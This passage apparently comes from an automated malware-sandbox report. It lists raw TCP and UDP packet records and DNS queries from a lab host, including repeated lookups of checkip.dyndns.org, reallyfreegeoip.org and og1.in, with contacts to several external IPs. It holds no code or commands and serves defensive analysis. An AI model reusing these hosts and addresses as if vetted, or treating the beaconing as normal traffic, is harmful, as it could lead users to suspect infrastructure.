                                                                                  Sep 30, 2024 10:13:00.807378054 CEST49189443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:00.807405949 CEST44349189188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.807590961 CEST49189443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:00.810323954 CEST49189443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:00.810337067 CEST44349189188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.895061970 CEST44349188188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.899681091 CEST49188443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:00.899727106 CEST44349188188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.976706028 CEST8049187193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.977372885 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:13:00.979803085 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:13:01.037476063 CEST44349188188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.037570000 CEST44349188188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.037759066 CEST49188443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.038563013 CEST49188443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.268691063 CEST44349189188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.268769026 CEST49189443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.294457912 CEST49189443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.294476032 CEST44349189188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.294984102 CEST44349189188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.419945002 CEST49189443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.467400074 CEST44349189188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.525640011 CEST44349189188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.525729895 CEST44349189188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.525780916 CEST49189443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.527210951 CEST49189443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.568557978 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:13:01.573625088 CEST8049187193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.836648941 CEST8049187193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.839142084 CEST49190443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.839188099 CEST44349190188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:01.839248896 CEST49190443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.839694023 CEST49190443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:01.839708090 CEST44349190188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.049649954 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:13:02.052743912 CEST8049187193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.052911043 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:13:02.294368029 CEST44349190188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.297333956 CEST49190443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:02.297359943 CEST44349190188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.434330940 CEST44349190188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.434423923 CEST44349190188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.434609890 CEST49190443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:02.434988976 CEST49190443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:02.450153112 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:13:02.455338955 CEST8049187193.122.6.168192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.455564976 CEST4918780192.168.2.22193.122.6.168
                                                                                  Sep 30, 2024 10:13:02.472064972 CEST4919180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:02.476995945 CEST8049191193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.477052927 CEST4919180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:02.477140903 CEST4919180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:02.482007980 CEST8049191193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.319080114 CEST8049191193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.391334057 CEST49192443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:03.391379118 CEST44349192188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.391431093 CEST49192443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:03.391933918 CEST49192443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:03.391946077 CEST44349192188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.528685093 CEST8049191193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.528765917 CEST4919180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:03.844336987 CEST44349192188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.847076893 CEST49192443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:03.847095966 CEST44349192188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.992814064 CEST44349192188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.992913961 CEST44349192188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.992990017 CEST49192443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:03.993544102 CEST49192443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:04.031066895 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:04.035880089 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:04.035968065 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:04.038429022 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:04.043196917 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.162117004 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.162138939 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.162242889 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.162306070 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:05.162306070 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:05.177231073 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.177273989 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.177335024 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.177700043 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.177709103 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.633023977 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.636029005 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.636054039 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.781502008 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.781610012 CEST44349194188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.781661987 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.782198906 CEST49194443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:05.799084902 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:05.804291010 CEST8049193158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.804344893 CEST4919380192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:05.821516037 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:05.826411963 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.826528072 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:05.826762915 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:05.831542015 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.520313978 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.543584108 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:06.543625116 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.543694973 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:06.544176102 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:06.544188023 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.728717089 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.728857040 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:07.020762920 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.025177002 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:07.025202036 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.171710014 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.171814919 CEST44349196188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.171915054 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:07.172818899 CEST49196443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:07.210211992 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:07.215910912 CEST8049195132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.215987921 CEST4919580192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:07.250468016 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:07.255465031 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.255534887 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:07.255975962 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:07.261136055 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.819729090 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.834464073 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:07.834503889 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.834563971 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:07.834983110 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:07.835004091 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.024512053 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:08.028758049 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.028825045 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:08.318072081 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.321397066 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:08.321413994 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.467511892 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.467627048 CEST44349198188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.467879057 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:08.468271971 CEST49198443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:08.481681108 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:08.487198114 CEST8049197158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.487281084 CEST4919780192.168.2.22158.101.44.242
                                                                                  Sep 30, 2024 10:13:08.508330107 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:08.513194084 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.513257980 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:08.513355970 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:08.518136978 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.177819967 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.200855970 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.200896978 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.200953007 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.201412916 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.201421976 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.384794950 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.384854078 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:09.676590919 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.680249929 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.680262089 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.823409081 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.823504925 CEST44349200188.114.97.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.823556900 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:09.824107885 CEST49200443192.168.2.22188.114.97.3
                                                                                  Sep 30, 2024 10:13:10.566524982 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:10.571968079 CEST8049199132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:10.572082996 CEST4919980192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:13:10.835136890 CEST4920180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:10.840140104 CEST8049201193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:10.842946053 CEST4920180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:10.859591007 CEST4920180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:10.864396095 CEST8049201193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.298773050 CEST8049201193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.350042105 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.350094080 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.350142002 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.350589991 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.350601912 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.508704901 CEST8049201193.122.130.0192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.508774042 CEST4920180192.168.2.22193.122.130.0
                                                                                  Sep 30, 2024 10:13:11.805995941 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.809509039 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.809536934 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.928837061 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.928972960 CEST44349202188.114.96.3192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.929063082 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:11.929996967 CEST49202443192.168.2.22188.114.96.3
                                                                                  Sep 30, 2024 10:13:57.695086956 CEST8049178132.226.247.73192.168.2.22
                                                                                  Sep 30, 2024 10:13:57.695241928 CEST4917880192.168.2.22132.226.247.73
                                                                                  Sep 30, 2024 10:14:05.396092892 CEST8049186158.101.44.242192.168.2.22
                                                                                  Sep 30, 2024 10:14:05.396236897 CEST4918680192.168.2.22158.101.44.242

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Sep 30, 2024 10:12:17.313853979 CEST5456253192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:17.329148054 CEST53545628.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:20.509154081 CEST5291753192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:20.523277044 CEST53529178.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:41.944890976 CEST6275153192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:41.951909065 CEST53627518.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:45.926701069 CEST5789353192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:45.933367014 CEST53578938.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:46.567028999 CEST5482153192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:46.573544979 CEST53548218.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:47.984357119 CEST5471953192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:47.995135069 CEST53547198.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:50.173897028 CEST4988153192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:50.180536985 CEST53498818.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:50.187478065 CEST5499853192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:50.194051027 CEST53549988.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.367163897 CEST5278153192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:51.377881050 CEST53527818.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:51.998110056 CEST6392653192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:52.004852057 CEST53639268.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:52.006623030 CEST6551053192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:52.012923002 CEST53655108.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:52.771644115 CEST6267253192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:52.791435957 CEST53626728.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:53.423391104 CEST5647553192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:53.429589987 CEST53564758.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:53.432066917 CEST4938453192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:53.441299915 CEST53493848.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:54.213107109 CEST5484253192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:54.222084999 CEST53548428.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:55.025249958 CEST5810553192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:55.031703949 CEST53581058.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:55.031876087 CEST5810553192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:55.038016081 CEST53581058.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:55.050251007 CEST6492853192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:55.056915045 CEST53649288.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:56.019016981 CEST5739053192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:56.026326895 CEST53573908.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:57.075826883 CEST5809553192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:57.082247019 CEST53580958.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:57.089489937 CEST5426153192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:57.095866919 CEST53542618.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:57.782089949 CEST6050753192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:57.789232016 CEST53605078.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:58.390197039 CEST5044653192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:58.397671938 CEST53504468.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:58.402548075 CEST5593953192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:58.410876989 CEST53559398.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:59.857712030 CEST4960853192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:59.865586996 CEST53496088.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:12:59.868752003 CEST6148653192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:12:59.875309944 CEST53614868.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.428492069 CEST6245353192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:00.439730883 CEST53624538.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:00.797677040 CEST5056853192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:00.804769039 CEST53505688.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.456545115 CEST6146753192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:02.463040113 CEST53614678.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:02.465128899 CEST6161853192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:02.471723080 CEST53616188.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:03.380299091 CEST5442253192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:03.390327930 CEST53544228.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:04.014008999 CEST5207453192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:04.020725965 CEST53520748.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:04.022653103 CEST5033753192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:04.028942108 CEST53503378.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.169572115 CEST6182653192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:05.176615953 CEST53618268.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.806227922 CEST5632953192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:05.812604904 CEST53563298.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:05.814817905 CEST6346953192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:05.821012020 CEST53634698.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:06.533123970 CEST5944753192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:06.542923927 CEST53594478.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.227011919 CEST5182853192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:07.237760067 CEST53518288.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.242930889 CEST5340653192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:07.249471903 CEST53534068.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:07.826901913 CEST5634553192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:07.833839893 CEST53563458.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.487097979 CEST5187053192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:08.493590117 CEST53518708.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:08.501348019 CEST6500953192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:08.507678986 CEST53650098.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:09.193315983 CEST6495653192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:09.200356960 CEST53649568.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:10.758645058 CEST5452153192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:10.765104055 CEST53545218.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:10.772866011 CEST4975053192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:10.780044079 CEST53497508.8.8.8192.168.2.22
                                                                                  Sep 30, 2024 10:13:11.341437101 CEST6468753192.168.2.228.8.8.8
                                                                                  Sep 30, 2024 10:13:11.348995924 CEST53646878.8.8.8192.168.2.22

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Sep 30, 2024 10:12:17.313853979 CEST192.168.2.228.8.8.80xff51Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:20.509154081 CEST192.168.2.228.8.8.80x1de7Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:41.944890976 CEST192.168.2.228.8.8.80x2970Standard query (0)og1.inA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:45.926701069 CEST192.168.2.228.8.8.80x3ebStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:46.567028999 CEST192.168.2.228.8.8.80x2a6dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:47.984357119 CEST192.168.2.228.8.8.80x5b74Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.173897028 CEST192.168.2.228.8.8.80xfc6dStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:50.187478065 CEST192.168.2.228.8.8.80x568eStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:51.367163897 CEST192.168.2.228.8.8.80x5922Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:51.998110056 CEST192.168.2.228.8.8.80x56c6Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.006623030 CEST192.168.2.228.8.8.80x5b57Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:52.771644115 CEST192.168.2.228.8.8.80x3791Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.423391104 CEST192.168.2.228.8.8.80x52c1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:53.432066917 CEST192.168.2.228.8.8.80xd0c1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:54.213107109 CEST192.168.2.228.8.8.80x5c0fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.025249958 CEST192.168.2.228.8.8.80xbaacStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.031876087 CEST192.168.2.228.8.8.80xbaacStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:55.050251007 CEST192.168.2.228.8.8.80x28d7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:56.019016981 CEST192.168.2.228.8.8.80xc9a0Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.075826883 CEST192.168.2.228.8.8.80x5182Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.089489937 CEST192.168.2.228.8.8.80x2167Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:57.782089949 CEST192.168.2.228.8.8.80x2827Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.390197039 CEST192.168.2.228.8.8.80x9c3fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                  Sep 30, 2024 10:12:58.402548075 CEST192.168.2.228.8.8.80x6978Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
